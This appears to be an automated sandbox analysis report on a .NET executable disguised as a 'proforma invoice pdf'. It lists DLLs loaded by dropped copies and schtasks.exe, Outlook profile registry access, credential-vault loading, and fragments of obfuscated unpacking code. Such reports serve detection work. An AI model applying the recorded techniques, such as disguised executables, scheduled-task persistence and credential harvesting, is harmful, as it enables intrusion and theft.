Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Section loaded: windowscodecs.dll

Source: C:\Users\user\Desktop\proforma invoice pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\proforma invoice pdf.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\proforma invoice pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: proforma invoice pdf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: proforma invoice pdf.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.proforma invoice pdf.exe.72a0000.3.raw.unpack, DlRvq5yJkomY4LIf3S.cs

.Net Code: X2WPMWey8AqqJOPa61l(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{X2WPMWey8AqqJOPa61l(typeof(IntPtr).TypeHandle),typeof(Type)})

.NET source code contains potential unpacker

Source: 0.2.proforma invoice pdf.exe.a3e0000.4.raw.unpack, GQbRhLZrZZosOjvGmq.cs	.Net Code: DDOsns7KiH System.Reflection.Assembly.Load(byte[])
Source: 0.2.proforma invoice pdf.exe.4122240.1.raw.unpack, GQbRhLZrZZosOjvGmq.cs	.Net Code: DDOsns7KiH System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 0_2_05920006 push eax; iretd	0_2_05920039
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 0_2_0730CE70 push eax; retf	0_2_0730CE71
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 0_2_07303A88 push esp; iretd	0_2_07303A89
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 10_2_071AA3F0 pushfd ; iretd	10_2_071AA69D
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 10_2_071A2F98 pushfd ; iretd	10_2_071A2F9D
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 10_2_071AAE21 push esp; iretd	10_2_071AAE2D
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 10_2_071AA3E1 pushad ; iretd	10_2_071AA3ED
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 10_2_071AA851 push C0071915h; iretd	10_2_071AA85D
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Code function: 11_2_04E9CE70 push eax; retf	11_2_04E9CE71
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Code function: 11_2_04E93A88 push esp; iretd	11_2_04E93A89
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Code function: 16_2_028DACB0 pushad ; retf	16_2_028DACB1
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Code function: 16_2_07249203 pushfd ; retf	16_2_07249215
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Code function: 16_2_07248A58 pushad ; retf	16_2_07248A65
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 20_2_07536420 pushad ; ret	20_2_07536429
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 20_2_0757B7F2 pushfd ; ret	20_2_0757B7F5
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 20_2_0757B780 push eax; ret	20_2_0757B781
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 20_2_0757C0E0 push esp; iretd	20_2_0757C0E9
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 22_2_013E5338 pushfd ; retf 0002h	22_2_013E5342
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 22_2_072ACE70 push eax; retf	22_2_072ACE71
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 22_2_072A3A88 push esp; iretd	22_2_072A3A89
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 25_2_06A3EC70 push es; ret	25_2_06A3EC80
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 25_2_06AA8700 push es; ret	25_2_06AA8710
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 25_2_06E7496E push ss; retf	25_2_06E74977

Source: proforma invoice pdf.exe	Static PE information: section name: .text entropy: 7.491026354805711
Source: wTyVrj.exe.0.dr	Static PE information: section name: .text entropy: 7.491026354805711
Source: bmBOz.exe.10.dr	Static PE information: section name: .text entropy: 7.491026354805711

Source: 0.2.proforma invoice pdf.exe.a3e0000.4.raw.unpack, wqtUbAPocUcXgnlIiT.cs	High entropy of concatenated method names: 'aEEVbWApPs', 'cahViJPbKM', 's4Wxp4ayUU', 'qxexk5Zx9b', 'pILV9hv2s3', 'BFuV4bwl43', 'GuLVgchf96', 'HQ9VaGdSmY', 'yyPVc8Ecga', 'QJtVrQn4Ip'
Source: 0.2.proforma invoice pdf.exe.a3e0000.4.raw.unpack, THOUJ1q3YIymargbV0.cs	High entropy of concatenated method names: 'Dispose', 'OigketfQOn', 'Huk8RCLSd8', 'hJFjJSidEQ', 'KJbki0hJ8Y', 'AGukzPKW50', 'ProcessDialogKey', 'IBe8pWjQNU', 'jmQ8k9QjFO', 'RZU88ELpew'
Source: 0.2.proforma invoice pdf.exe.a3e0000.4.raw.unpack, b7IpFZCIbSxxN51h6x.cs	High entropy of concatenated method names: 'S8812wZDpo', 'lj51qFldsD', 'hl713B1CAA', 'rjt1H3Acu1', 'rAV1ZU42Jx', 'h2P3TNUmGu', 'bEZ3PZU3ds', 'TV03XhtkLq', 'bPd3bSL1i2', 'NM63elLcYZ'
Source: 0.2.proforma invoice pdf.exe.a3e0000.4.raw.unpack, TKpOpmsM0Eb12noJkw.cs	High entropy of concatenated method names: 'j3RkHBaoBH', 'SMSkZrduWs', 'fVskFEqLKN', 'o5CkUuWRYJ', 'j1PkhlNk7I', 'aFZkjIbSxx', 'qTYyrdnGNSCh1ItyNv', 'zeDkOlveccmSUX3rpw', 'xA5kk5pIWb', 'o9hkGQLwhn'
Source: 0.2.proforma invoice pdf.exe.a3e0000.4.raw.unpack, cgWfmkksQcXIJ6iBSNp.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zviEyo2fba', 'g61EfOeNUn', 'LyKEAqS8SK', 'ACcEEGentR', 'DjFEoTgnMD', 'prtE0Ntles', 'vyjEWMWboi'
Source: 0.2.proforma invoice pdf.exe.a3e0000.4.raw.unpack, XWjQNUeHmQ9QjFOaZU.cs	High entropy of concatenated method names: 'KIcyCOKtUu', 'lHFyRsnBtq', 'BXgyIw5qjG', 'PoYySfdJQY', 'kyMyvg9IXd', 'CORyBCfrXY', 'KOKywOwkvY', 'jOfyll1cFp', 'Y3tymTEIMK', 'TSqyJZ3Vh9'
Source: 0.2.proforma invoice pdf.exe.a3e0000.4.raw.unpack, XVQRZVwM9Cj0E4C2OM.cs	High entropy of concatenated method names: 'BjVHYyAIkY', 'FiqHLk5du2', 'I8RH1Duu9M', 'uVX1ikMqor', 'krf1zAEqli', 'DE5HpCDw0P', 'lmuHkEBN3A', 'lGWH8pSmZn', 'GqNHGw1Vpv', 'ykUHsds3MF'
Source: 0.2.proforma invoice pdf.exe.a3e0000.4.raw.unpack, n64sjVa6KIhd4h0fZa.cs	High entropy of concatenated method names: 'BTphJuN301', 'ztph4Mxl97', 'ey1hakmv2S', 'LVkhcY5TTk', 'YSnhRit0Zi', 'JX3hIUrdtT', 'jsJhSyswyj', 'r7Hhv9EjS8', 'ko5hBrDb3g', 'AdGhwx6jv1'
Source: 0.2.proforma invoice pdf.exe.a3e0000.4.raw.unpack, wyE9JZz739cqAQ1k9N.cs	High entropy of concatenated method names: 'Siuf6rVJkc', 'L0efDj437O', 'tJoftCV82s', 'jOmfCiQ8NY', 'mdQfRT3EvN', 'Ct1fSiqtv1', 'PGJfvEfgq6', 'lP3fWZgdYD', 'xDTfKRjx1T', 'gfvf5RjWcw'
Source: 0.2.proforma invoice pdf.exe.a3e0000.4.raw.unpack, bo7YTYtVsEqLKNM5Cu.cs	High entropy of concatenated method names: 'zr3LNMaFUE', 'ixTL67QXdE', 'QNbLDCdFPV', 'mOHLtaloUF', 'DkMLh21LLL', 'vDMLjOOx5A', 'u4JLV3P3H8', 'eBTLxCnr5U', 'syBLyHVsCn', 'xiNLfVBUE9'
Source: 0.2.proforma invoice pdf.exe.a3e0000.4.raw.unpack, GBaoBHDcMSrduWs3oj.cs	High entropy of concatenated method names: 'mRwqag0Mm3', 'LBhqcyKDuJ', 'rbGqrqjOZu', 'KEIq7MNmMM', 'yOQqT2iTrq', 'ApBqPlMFEC', 'G8lqXGCM2m', 'FPaqbSUcrK', 'YIeqeGnTDL', 'L7tqi5kJih'
Source: 0.2.proforma invoice pdf.exe.a3e0000.4.raw.unpack, xRYJ6TQo5VDMKH1PlN.cs	High entropy of concatenated method names: 'ids3ueXBby', 'mEy3OXMJgv', 'u2ZLIcuLYk', 'p9fLSv8978', 'LbpLvHinNu', 'PERLBACAPp', 'XC0Lw97hiG', 'ifKLlKBeUh', 'Xi4LmyVGy8', 'D2sLJXguWe'
Source: 0.2.proforma invoice pdf.exe.a3e0000.4.raw.unpack, dfdqZWXagJigtfQOnB.cs	High entropy of concatenated method names: 'EGSyhobYi4', 'gWIyV9TDD1', 'QFfyybRB9i', 'XLjyACsphv', 'CimyoTs43a', 'BuUyWt1ufo', 'Dispose', 'hdoxYPQkrB', 'XBZxq7cpt8', 'TaoxLtXhGI'
Source: 0.2.proforma invoice pdf.exe.a3e0000.4.raw.unpack, Tly5A2kkRWy5NhIJJ2l.cs	High entropy of concatenated method names: 'y6NfiKdFUy', 'm1UfzcmuP6', 'YKVAp0u9lX', 'BBeAkFdCDS', 'iHBA8pimB2', 'mQ7AGeSUS8', 'QlpAsUk0gs', 'tJmA2Wpot0', 'cmBAYUUkLm', 'qtVAqI43bT'
Source: 0.2.proforma invoice pdf.exe.a3e0000.4.raw.unpack, x6FDdEkpePPXuV9h0SZ.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BVsf9gS8nL', 'deuf4GWgJa', 'M7vfgYDXq3', 'yArfatW5Rr', 'EAyfcEy6tE', 'Dp0frr9WRv', 'c6if7Vj4VA'
Source: 0.2.proforma invoice pdf.exe.a3e0000.4.raw.unpack, SxEwAW806ubANcSZ71.cs	High entropy of concatenated method names: 'QlrnnGOFk', 'TVFNdWS8l', 'PvK6en4YF', 'ARXOrWuTu', 'zdntJyPMu', 'fJ2Q2cgAM', 'gyfgS8hXVIhJn6bIiD', 'LMjco5jjgZvmNfVMnt', 'xqsx8VSD7', 'rJrfhPR3a'
Source: 0.2.proforma invoice pdf.exe.a3e0000.4.raw.unpack, uLpewfijnYHP5ANMWc.cs	High entropy of concatenated method names: 'vLSfLJ18Co', 'FPkf37Cwcx', 'QMdf1dBXdO', 'WM7fHfJwdQ', 'CHKfyX6uwb', 'bGNfZj67vg', 'Next', 'Next', 'Next', 'NextBytes'
